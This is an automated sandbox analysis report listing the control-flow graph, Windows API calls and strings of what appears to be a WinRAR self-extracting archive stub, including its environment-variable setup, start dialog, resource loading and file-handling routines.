fdc498 25021->25025 25022 fd8dcc _free 20 API calls 25023 fdc4ea 25022->25023 25023->25012 25024->25021 25025->25022 25026->25008 25027->25011 25028->25011 25030 fcec50 25029->25030 25031 fc086d GetModuleHandleW 25030->25031 25032 fc0888 GetProcAddress 25031->25032 25033 fc08e7 25031->25033 25034 fc08b9 GetProcAddress 25032->25034 25035 fc08a1 25032->25035 25036 fc0c14 GetModuleFileNameW 
25033->25036 25134 fd75fb 42 API calls 2 library calls 25033->25134 25037 fc08cb 25034->25037 25035->25034 25045 fc0c32 25036->25045 25037->25033 25039 fc0b54 25039->25036 25040 fc0b5f GetModuleFileNameW CreateFileW 25039->25040 25041 fc0b8f SetFilePointer 25040->25041 25042 fc0c08 CloseHandle 25040->25042 25041->25042 25043 fc0b9d ReadFile 25041->25043 25042->25036 25043->25042 25047 fc0bbb 25043->25047 25048 fc0c94 GetFileAttributesW 25045->25048 25050 fc0c5d CompareStringW 25045->25050 25051 fc0cac 25045->25051 25125 fbb146 25045->25125 25128 fc081b 25045->25128 25047->25042 25049 fc081b 2 API calls 25047->25049 25048->25045 25048->25051 25049->25047 25050->25045 25052 fc0cb7 25051->25052 25055 fc0cec 25051->25055 25054 fc0cd0 GetFileAttributesW 25052->25054 25056 fc0ce8 25052->25056 25053 fc0dfb 25077 fca64d GetCurrentDirectoryW 25053->25077 25054->25052 25054->25056 25055->25053 25057 fbb146 GetVersionExW 25055->25057 25056->25055 25058 fc0d06 25057->25058 25059 fc0d0d 25058->25059 25060 fc0d73 25058->25060 25062 fc081b 2 API calls 25059->25062 25061 fb4092 _swprintf 51 API calls 25060->25061 25063 fc0d9b AllocConsole 25061->25063 25064 fc0d17 25062->25064 25065 fc0da8 GetCurrentProcessId AttachConsole 25063->25065 25066 fc0df3 ExitProcess 25063->25066 25067 fc081b 2 API calls 25064->25067 25135 fd3e13 25065->25135 25069 fc0d21 25067->25069 25071 fbe617 53 API calls 25069->25071 25070 fc0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25070->25066 25072 fc0d3c 25071->25072 25073 fb4092 _swprintf 51 API calls 25072->25073 25074 fc0d4f 25073->25074 25075 fbe617 53 API calls 25074->25075 25076 fc0d5e 25075->25076 25076->25066 25077->24877 25079 fc081b 2 API calls 25078->25079 25080 fcac2a OleInitialize 25079->25080 25081 fcac4d GdiplusStartup SHGetMalloc 25080->25081 25081->24879 25085 fcc5ce 25082->25085 25083 fcc6e4 25083->24888 25083->24889 25084 fc1fac CharUpperW 25084->25085 25085->25083 25085->25084 25137 fbf3fa 82 API calls 2 library calls 25085->25137 
25088 fcec50 25087->25088 25089 fcdbeb SetEnvironmentVariableW 25088->25089 25091 fcdc0e 25089->25091 25090 fcdc36 25090->24882 25091->25090 25092 fcdc2a SetEnvironmentVariableW 25091->25092 25092->25090 25094 fcb6fe 25093->25094 25095 fcb70b GetObjectW 25093->25095 25138 fca6c2 FindResourceW 25094->25138 25097 fcb71a 25095->25097 25098 fca5c6 4 API calls 25097->25098 25101 fcb72d 25098->25101 25100 fcb770 25112 fbda42 25100->25112 25101->25100 25102 fcb74c 25101->25102 25103 fca6c2 12 API calls 25101->25103 25152 fca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25102->25152 25105 fcb73d 25103->25105 25105->25102 25107 fcb743 DeleteObject 25105->25107 25106 fcb754 25153 fca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25106->25153 25107->25102 25109 fcb75d 25154 fca80c 8 API calls 25109->25154 25111 fcb764 DeleteObject 25111->25100 25163 fbda67 25112->25163 25117 fc90b7 25118 fceb38 8 API calls 25117->25118 25119 fc90d6 25118->25119 25119->24901 25121 fcacab GdiplusShutdown OleUninitialize 25120->25121 25121->24917 25123->24908 25124->24916 25126 fbb15a GetVersionExW 25125->25126 25127 fbb196 25125->25127 25126->25127 25127->25045 25129 fcec50 25128->25129 25130 fc0828 GetSystemDirectoryW 25129->25130 25131 fc085e 25130->25131 25132 fc0840 25130->25132 25131->25045 25133 fc0851 LoadLibraryW 25132->25133 25133->25131 25134->25039 25136 fd3e1b 25135->25136 25136->25070 25136->25136 25137->25085 25139 fca7d3 25138->25139 25140 fca6e5 SizeofResource 25138->25140 25139->25095 25139->25097 25140->25139 25141 fca6fc LoadResource 25140->25141 25141->25139 25142 fca711 LockResource 25141->25142 25142->25139 25143 fca722 GlobalAlloc 25142->25143 25143->25139 25144 fca73d GlobalLock 25143->25144 25145 fca7cc GlobalFree 25144->25145 25146 fca74c __InternalCxxFrameHandler 25144->25146 25145->25139 25147 fca7c5 GlobalUnlock 25146->25147 25155 fca626 GdipAlloc 25146->25155 25147->25145 25150 fca79a GdipCreateHBITMAPFromBitmap 25151 fca7b0 25150->25151 25151->25147 
25152->25106 25153->25109 25154->25111 25156 fca638 25155->25156 25157 fca645 25155->25157 25159 fca3b9 25156->25159 25157->25147 25157->25150 25157->25151 25160 fca3da GdipCreateBitmapFromStreamICM 25159->25160 25161 fca3e1 GdipCreateBitmapFromStream 25159->25161 25162 fca3e6 25160->25162 25161->25162 25162->25157 25164 fbda75 __EH_prolog 25163->25164 25165 fbdaa4 GetModuleFileNameW 25164->25165 25166 fbdad5 25164->25166 25167 fbdabe 25165->25167 25209 fb98e0 25166->25209 25167->25166 25169 fbdb31 25220 fd6310 25169->25220 25170 fb959a 80 API calls 25171 fbda4e 25170->25171 25207 fbe29e GetModuleHandleW FindResourceW 25171->25207 25173 fbdb05 25173->25169 25175 fbe261 78 API calls 25173->25175 25200 fbdd4a 25173->25200 25174 fbdb44 25176 fd6310 26 API calls 25174->25176 25175->25173 25185 fbdb56 ___vcrt_FlsFree 25176->25185 25177 fbdc85 25177->25200 25240 fb9d70 81 API calls 25177->25240 25179 fb9e80 79 API calls 25179->25185 25181 fbdc9f ___std_exception_copy 25182 fb9bd0 82 API calls 25181->25182 25181->25200 25183 fbdcc8 ___std_exception_copy 25182->25183 25183->25200 25204 fbdcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25183->25204 25241 fc1b84 MultiByteToWideChar 25183->25241 25185->25177 25185->25179 25185->25200 25234 fb9bd0 25185->25234 25239 fb9d70 81 API calls 25185->25239 25187 fbe159 25193 fbe1de 25187->25193 25247 fd8cce 26 API calls 2 library calls 25187->25247 25190 fbe16e 25248 fd7625 26 API calls 2 library calls 25190->25248 25192 fbe1c6 25249 fbe27c 78 API calls 25192->25249 25194 fbe214 25193->25194 25196 fbe261 78 API calls 25193->25196 25197 fd6310 26 API calls 25194->25197 25196->25193 25198 fbe22d 25197->25198 25199 fd6310 26 API calls 25198->25199 25199->25200 25200->25170 25202 fc1da7 WideCharToMultiByte 25202->25204 25204->25187 25204->25200 25204->25202 25242 fbe5b1 50 API calls __vsnprintf 25204->25242 25243 fd6159 26 API calls 3 library calls 25204->25243 25244 fd8cce 26 API calls 2 library calls 25204->25244 25245 fd7625 26 API 
calls 2 library calls 25204->25245 25246 fbe27c 78 API calls 25204->25246 25208 fbda55 25207->25208 25208->25117 25210 fb98ea 25209->25210 25211 fb994b CreateFileW 25210->25211 25212 fb99bb 25211->25212 25213 fb996c GetLastError 25211->25213 25217 fb99ff 25212->25217 25219 fb99e5 SetFileTime 25212->25219 25214 fbbb03 GetCurrentDirectoryW 25213->25214 25215 fb998c 25214->25215 25215->25212 25216 fb9990 CreateFileW GetLastError 25215->25216 25216->25212 25218 fb99b5 25216->25218 25217->25173 25218->25212 25219->25217 25221 fd6349 25220->25221 25222 fd634d 25221->25222 25233 fd6375 25221->25233 25250 fd91a8 20 API calls __dosmaperr 25222->25250 25224 fd6352 25251 fd9087 26 API calls __cftof 25224->25251 25225 fd6699 25227 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25225->25227 25229 fd66a6 25227->25229 25228 fd635d 25230 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25228->25230 25229->25174 25231 fd6369 25230->25231 25231->25174 25233->25225 25252 fd6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25233->25252 25235 fb9bdc 25234->25235 25236 fb9be3 25234->25236 25235->25185 25236->25235 25238 fb9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25236->25238 25253 fb6d1a 77 API calls 25236->25253 25238->25236 25239->25185 25240->25181 25241->25204 25242->25204 25243->25204 25244->25204 25245->25204 25246->25204 25247->25190 25248->25192 25249->25193 25250->25224 25251->25228 25252->25233 25253->25236 25255 fd7ce1 _unexpected 25254->25255 25256 fd7ce8 25255->25256 25257 fd7cfa 25255->25257 25290 fd7e2f GetModuleHandleW 25256->25290 25278 fdac31 EnterCriticalSection 25257->25278 25260 fd7ced 25260->25257 25291 fd7e73 GetModuleHandleExW 25260->25291 25261 fd7d9f 25279 fd7ddf 25261->25279 25265 fd7d76 25270 fd7d8e 25265->25270 25275 fd8a91 _abort 5 API calls 25265->25275 25267 fd7d01 25267->25261 25267->25265 25299 fd87e0 20 API calls _abort 25267->25299 25268 fd7dbc 25282 
fd7dee 25268->25282 25269 fd7de8 25300 fe2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25269->25300 25271 fd8a91 _abort 5 API calls 25270->25271 25271->25261 25275->25270 25278->25267 25301 fdac81 LeaveCriticalSection 25279->25301 25281 fd7db8 25281->25268 25281->25269 25302 fdb076 25282->25302 25285 fd7e1c 25288 fd7e73 _abort 8 API calls 25285->25288 25286 fd7dfc GetPEB 25286->25285 25287 fd7e0c GetCurrentProcess TerminateProcess 25286->25287 25287->25285 25289 fd7e24 ExitProcess 25288->25289 25290->25260 25292 fd7e9d GetProcAddress 25291->25292 25293 fd7ec0 25291->25293 25297 fd7eb2 25292->25297 25294 fd7ecf 25293->25294 25295 fd7ec6 FreeLibrary 25293->25295 25296 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25294->25296 25295->25294 25298 fd7cf9 25296->25298 25297->25293 25298->25257 25299->25265 25301->25281 25303 fdb09b 25302->25303 25307 fdb091 25302->25307 25304 fdac98 __dosmaperr 5 API calls 25303->25304 25304->25307 25305 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25306 fd7df8 25305->25306 25306->25285 25306->25286 25307->25305 25413 fb6faa 111 API calls 3 library calls 25373 fceda7 48 API calls _unexpected 25414 fcf3a0 27 API calls 25338 fda4a0 71 API calls _free 25339 fcdca1 DialogBoxParamW 25340 fe08a0 IsProcessorFeaturePresent 25341 fdb49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25374 fcb18d 74 API calls 25343 fcc793 97 API calls 4 library calls 25396 fcc793 102 API calls 4 library calls 25376 fc9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 23384 fb9f7a 23385 fb9f88 23384->23385 23386 fb9f8f 23384->23386 23387 fb9f9c GetStdHandle 23386->23387 23394 fb9fab 23386->23394 23387->23394 23388 fba003 WriteFile 23388->23394 23389 fb9fcf 23390 fb9fd4 WriteFile 23389->23390 23389->23394 23390->23389 23390->23394 23392 fba095 23396 fb6e98 77 API calls 23392->23396 23394->23385 23394->23388 23394->23389 23394->23390 
23394->23392 23395 fb6baa 78 API calls 23394->23395 23395->23394 23396->23385 25416 fb1f72 128 API calls __EH_prolog 25346 fca070 10 API calls 25397 fcb270 99 API calls 25348 fb1075 84 API calls 23452 fb9a74 23455 fb9a7e 23452->23455 23453 fb9b9d SetFilePointer 23454 fb9bb6 GetLastError 23453->23454 23458 fb9ab1 23453->23458 23454->23458 23455->23453 23457 fb9b79 23455->23457 23455->23458 23459 fb981a 23455->23459 23457->23453 23460 fb9833 23459->23460 23463 fb9e80 23460->23463 23464 fb9e92 23463->23464 23468 fb9ea5 23463->23468 23467 fb9865 23464->23467 23472 fb6d5b 77 API calls 23464->23472 23466 fb9eb8 SetFilePointer 23466->23467 23469 fb9ed4 GetLastError 23466->23469 23467->23457 23468->23466 23468->23467 23469->23467 23470 fb9ede 23469->23470 23470->23467 23473 fb6d5b 77 API calls 23470->23473 23472->23468 23473->23467 25418 fd7f6e 52 API calls 2 library calls 23477 fce569 23478 fce517 23477->23478 23478->23477 23480 fce85d 23478->23480 23506 fce5bb 23480->23506 23482 fce86d 23483 fce8ee 23482->23483 23484 fce8ca 23482->23484 23487 fce966 LoadLibraryExA 23483->23487 23489 fce9c7 23483->23489 23494 fce9d9 23483->23494 23501 fcea95 23483->23501 23485 fce7fb DloadReleaseSectionWriteAccess 6 API calls 23484->23485 23486 fce8d5 RaiseException 23485->23486 23502 fceac3 23486->23502 23488 fce979 GetLastError 23487->23488 23487->23489 23490 fce98c 23488->23490 23491 fce9a2 23488->23491 23493 fce9d2 FreeLibrary 23489->23493 23489->23494 23490->23489 23490->23491 23495 fce7fb DloadReleaseSectionWriteAccess 6 API calls 23491->23495 23492 fcea37 GetProcAddress 23496 fcea47 GetLastError 23492->23496 23492->23501 23493->23494 23494->23492 23494->23501 23497 fce9ad RaiseException 23495->23497 23498 fcea5a 23496->23498 23497->23502 23500 fce7fb DloadReleaseSectionWriteAccess 6 API calls 23498->23500 23498->23501 23503 fcea7b RaiseException 23500->23503 23515 fce7fb 23501->23515 23502->23478 23504 fce5bb ___delayLoadHelper2@8 6 API calls 23503->23504 23505 fcea92 23504->23505 
23505->23501 23507 fce5ed 23506->23507 23508 fce5c7 23506->23508 23507->23482 23523 fce664 23508->23523 23510 fce5cc 23511 fce5e8 23510->23511 23526 fce78d 23510->23526 23531 fce5ee GetModuleHandleW GetProcAddress GetProcAddress 23511->23531 23514 fce836 23514->23482 23516 fce80d 23515->23516 23517 fce82f 23515->23517 23518 fce664 DloadReleaseSectionWriteAccess 3 API calls 23516->23518 23517->23502 23519 fce812 23518->23519 23520 fce82a 23519->23520 23521 fce78d DloadProtectSection 3 API calls 23519->23521 23534 fce831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23520->23534 23521->23520 23532 fce5ee GetModuleHandleW GetProcAddress GetProcAddress 23523->23532 23525 fce669 23525->23510 23527 fce7a2 DloadProtectSection 23526->23527 23528 fce7dd VirtualProtect 23527->23528 23529 fce7a8 23527->23529 23533 fce6a3 VirtualQuery GetSystemInfo 23527->23533 23528->23529 23529->23511 23531->23514 23532->23525 23533->23528 23534->23517 25398 fd8268 55 API calls _free 25349 fcc793 107 API calls 4 library calls 24589 fccd58 24590 fcce22 24589->24590 24596 fccd7b 24589->24596 24600 fcc793 _wcslen _wcsrchr 24590->24600 24617 fcd78f 24590->24617 24591 fcb314 ExpandEnvironmentStringsW 24591->24600 24593 fcd40a 24595 fc1fbb CompareStringW 24595->24596 24596->24590 24596->24595 24597 fcca67 SetWindowTextW 24597->24600 24600->24591 24600->24593 24600->24597 24601 fd3e3e 22 API calls 24600->24601 24603 fcc855 SetFileAttributesW 24600->24603 24608 fccc31 GetDlgItem SetWindowTextW SendMessageW 24600->24608 24611 fccc71 SendMessageW 24600->24611 24616 fc1fbb CompareStringW 24600->24616 24641 fca64d GetCurrentDirectoryW 24600->24641 24643 fba5d1 6 API calls 24600->24643 24644 fba55a FindClose 24600->24644 24645 fcb48e 76 API calls 2 library calls 24600->24645 24601->24600 24605 fcc90f GetFileAttributesW 24603->24605 24615 fcc86f __cftof _wcslen 24603->24615 24605->24600 24607 fcc921 DeleteFileW 24605->24607 24607->24600 24609 fcc932 24607->24609 
24608->24600 24610 fb4092 _swprintf 51 API calls 24609->24610 24612 fcc952 GetFileAttributesW 24610->24612 24611->24600 24612->24609 24613 fcc967 MoveFileW 24612->24613 24613->24600 24614 fcc97f MoveFileExW 24613->24614 24614->24600 24615->24600 24615->24605 24642 fbb991 51 API calls 2 library calls 24615->24642 24616->24600 24618 fcd799 __cftof _wcslen 24617->24618 24619 fcd9c0 24618->24619 24620 fcd8a5 24618->24620 24622 fcd9e7 24618->24622 24646 fc1fbb CompareStringW 24618->24646 24619->24622 24625 fcd9de ShowWindow 24619->24625 24621 fba231 3 API calls 24620->24621 24624 fcd8ba 24621->24624 24622->24600 24626 fcd8d9 ShellExecuteExW 24624->24626 24647 fbb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24624->24647 24625->24622 24626->24622 24633 fcd8ec 24626->24633 24628 fcd8d1 24628->24626 24629 fcd925 24648 fcdc3b 6 API calls 24629->24648 24630 fcd97b CloseHandle 24631 fcd994 24630->24631 24632 fcd989 24630->24632 24631->24619 24649 fc1fbb CompareStringW 24632->24649 24633->24629 24633->24630 24636 fcd91b ShowWindow 24633->24636 24636->24629 24637 fcd93d 24637->24630 24638 fcd950 GetExitCodeProcess 24637->24638 24638->24630 24639 fcd963 24638->24639 24639->24630 24641->24600 24642->24615 24643->24600 24644->24600 24645->24600 24646->24620 24647->24628 24648->24637 24649->24631 25350 fce455 14 API calls ___delayLoadHelper2@8 24654 fdc051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25351 fca440 GdipCloneImage GdipAlloc 25400 fd3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25420 fe1f40 CloseHandle 25381 fcf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25421 fcff30 LocalFree 24693 fdbb30 24694 fdbb39 24693->24694 24695 fdbb42 24693->24695 24697 fdba27 24694->24697 24698 fd97e5 _unexpected 38 API calls 24697->24698 24699 fdba34 24698->24699 24717 fdbb4e 24699->24717 24701 fdba3c 24726 fdb7bb 24701->24726 24704 fd8e06 __vsnwprintf_l 21 
API calls 24705 fdba64 24704->24705 24716 fdba96 24705->24716 24733 fdbbf0 24705->24733 24708 fd8dcc _free 20 API calls 24710 fdba53 24708->24710 24709 fdba91 24743 fd91a8 20 API calls __dosmaperr 24709->24743 24710->24695 24711 fdbaae 24713 fdbada 24711->24713 24714 fd8dcc _free 20 API calls 24711->24714 24713->24716 24744 fdb691 26 API calls 24713->24744 24714->24713 24716->24708 24718 fdbb5a ___scrt_is_nonwritable_in_current_image 24717->24718 24719 fd97e5 _unexpected 38 API calls 24718->24719 24721 fdbb64 24719->24721 24724 fdbbe8 _abort 24721->24724 24725 fd8dcc _free 20 API calls 24721->24725 24745 fd8d24 38 API calls _abort 24721->24745 24746 fdac31 EnterCriticalSection 24721->24746 24747 fdbbdf LeaveCriticalSection _abort 24721->24747 24724->24701 24725->24721 24727 fd4636 __fassign 38 API calls 24726->24727 24728 fdb7cd 24727->24728 24729 fdb7dc GetOEMCP 24728->24729 24730 fdb7ee 24728->24730 24731 fdb805 24729->24731 24730->24731 24732 fdb7f3 GetACP 24730->24732 24731->24704 24731->24710 24732->24731 24734 fdb7bb 40 API calls 24733->24734 24735 fdbc0f 24734->24735 24738 fdbc60 IsValidCodePage 24735->24738 24740 fdbc16 24735->24740 24742 fdbc85 __cftof 24735->24742 24736 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24737 fdba89 24736->24737 24737->24709 24737->24711 24739 fdbc72 GetCPInfo 24738->24739 24738->24740 24739->24740 24739->24742 24740->24736 24748 fdb893 GetCPInfo 24742->24748 24743->24716 24744->24716 24746->24721 24747->24721 24749 fdb977 24748->24749 24753 fdb8cd 24748->24753 24752 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24749->24752 24755 fdba23 24752->24755 24758 fdc988 24753->24758 24755->24740 24757 fdab78 __vsnwprintf_l 43 API calls 24757->24749 24759 fd4636 __fassign 38 API calls 24758->24759 24760 fdc9a8 MultiByteToWideChar 24759->24760 24762 fdca7e 24760->24762 24763 fdc9e6 24760->24763 24764 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 
24762->24764 24765 fd8e06 __vsnwprintf_l 21 API calls 24763->24765 24769 fdca07 __cftof __vsnwprintf_l 24763->24769 24766 fdb92e 24764->24766 24765->24769 24772 fdab78 24766->24772 24767 fdca78 24777 fdabc3 20 API calls _free 24767->24777 24769->24767 24770 fdca4c MultiByteToWideChar 24769->24770 24770->24767 24771 fdca68 GetStringTypeW 24770->24771 24771->24767 24773 fd4636 __fassign 38 API calls 24772->24773 24774 fdab8b 24773->24774 24778 fda95b 24774->24778 24777->24762 24779 fda976 __vsnwprintf_l 24778->24779 24780 fda99c MultiByteToWideChar 24779->24780 24782 fda9c6 24780->24782 24792 fdab50 24780->24792 24781 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24783 fdab63 24781->24783 24784 fda9e7 __vsnwprintf_l 24782->24784 24785 fd8e06 __vsnwprintf_l 21 API calls 24782->24785 24783->24757 24786 fdaa9c 24784->24786 24787 fdaa30 MultiByteToWideChar 24784->24787 24785->24784 24814 fdabc3 20 API calls _free 24786->24814 24787->24786 24788 fdaa49 24787->24788 24805 fdaf6c 24788->24805 24792->24781 24793 fdaaab 24797 fd8e06 __vsnwprintf_l 21 API calls 24793->24797 24800 fdaacc __vsnwprintf_l 24793->24800 24794 fdaa73 24794->24786 24795 fdaf6c __vsnwprintf_l 11 API calls 24794->24795 24795->24786 24796 fdab41 24813 fdabc3 20 API calls _free 24796->24813 24797->24800 24798 fdaf6c __vsnwprintf_l 11 API calls 24801 fdab20 24798->24801 24800->24796 24800->24798 24801->24796 24802 fdab2f WideCharToMultiByte 24801->24802 24802->24796 24803 fdab6f 24802->24803 24815 fdabc3 20 API calls _free 24803->24815 24806 fdac98 __dosmaperr 5 API calls 24805->24806 24807 fdaf93 24806->24807 24810 fdaf9c 24807->24810 24816 fdaff4 10 API calls 3 library calls 24807->24816 24809 fdafdc LCMapStringW 24809->24810 24811 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24810->24811 24812 fdaa60 24811->24812 24812->24786 24812->24793 24812->24794 24813->24786 24814->24792 24815->24786 24816->24809 25354 fdc030 GetProcessHeap 25382 fdb4ae 27 
API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25356 fdf421 21 API calls __vsnwprintf_l 25401 fcc220 93 API calls _swprintf 25358 fb1025 29 API calls 25424 fb1710 86 API calls 25384 fcad10 73 API calls 25361 fca400 GdipDisposeImage GdipFree 25402 fcd600 70 API calls 25362 fd6000 QueryPerformanceFrequency QueryPerformanceCounter 25387 fd2900 6 API calls 4 library calls 25403 fdf200 51 API calls 25425 fda700 21 API calls

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00FC0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00FC087C
                                                            • Part of subcall function 00FC0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FC088E
                                                            • Part of subcall function 00FC0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FC08BF
                                                            • Part of subcall function 00FCA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00FCA655
                                                            • Part of subcall function 00FCAC16: OleInitialize.OLE32(00000000), ref: 00FCAC2F
                                                            • Part of subcall function 00FCAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FCAC66
                                                            • Part of subcall function 00FCAC16: SHGetMalloc.SHELL32(00FF8438), ref: 00FCAC70
                                                          • GetCommandLineW.KERNEL32 ref: 00FCDF5C
                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00FCDF83
                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00FCDF94
                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00FCDFCE
                                                            • Part of subcall function 00FCDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FCDBF4
                                                            • Part of subcall function 00FCDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FCDC30
                                                          • CloseHandle.KERNEL32(00000000), ref: 00FCDFD7
                                                          • GetModuleFileNameW.KERNEL32(00000000,0100EC90,00000800), ref: 00FCDFF2
                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,0100EC90), ref: 00FCDFFE
                                                          • GetLocalTime.KERNEL32(?), ref: 00FCE009
                                                          • _swprintf.LIBCMT ref: 00FCE048
                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00FCE05A
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00FCE061
                                                          • LoadIconW.USER32(00000000,00000064), ref: 00FCE078
                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00FCE0C9
                                                          • Sleep.KERNEL32(?), ref: 00FCE0F7
                                                          • DeleteObject.GDI32 ref: 00FCE130
                                                          • DeleteObject.GDI32(?), ref: 00FCE140
                                                          • CloseHandle.KERNEL32 ref: 00FCE183
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp

                                                          Control-flow Graph

                                                          APIs
                                                          • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FCB73D,00000066), ref: 00FCA6D5
                                                          • SizeofResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA6EC
                                                          • LoadResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA703
                                                          • LockResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA712
                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FCB73D,00000066), ref: 00FCA72D
                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00FCB73D,00000066), ref: 00FCA73E
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00FCA7C6
                                                            • Part of subcall function 00FCA626: GdipAlloc.GDIPLUS(00000010), ref: 00FCA62C
                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FCA7A7
                                                          • GlobalFree.KERNEL32(00000000), ref: 00FCA7CD
                                                          Strings
                                                          Similarity
                                                          • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                          • String ID: PNG

                                                          Control-flow Graph

                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6C4
                                                            • Part of subcall function 00FBBB03: _wcslen.LIBCMT ref: 00FBBB27
                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6F2
                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6FE
                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA728
                                                          • GetLastError.KERNEL32(?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA734
                                                          Similarity
                                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                          • String ID:
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000000,?,00FD7DC4,00000000,00FEC300,0000000C,00FD7F1B,00000000,00000002,00000000), ref: 00FD7E0F
                                                          • TerminateProcess.KERNEL32(00000000,?,00FD7DC4,00000000,00FEC300,0000000C,00FD7F1B,00000000,00000002,00000000), ref: 00FD7E16
                                                          • ExitProcess.KERNEL32 ref: 00FD7E28
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          APIs
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FCB7E5
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCB8D1
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB8EF
                                                          • IsDialogMessageW.USER32(?,?), ref: 00FCB902
                                                          • TranslateMessage.USER32(?), ref: 00FCB910
                                                          • DispatchMessageW.USER32(?), ref: 00FCB91A
                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00FCB93D
                                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00FCB960
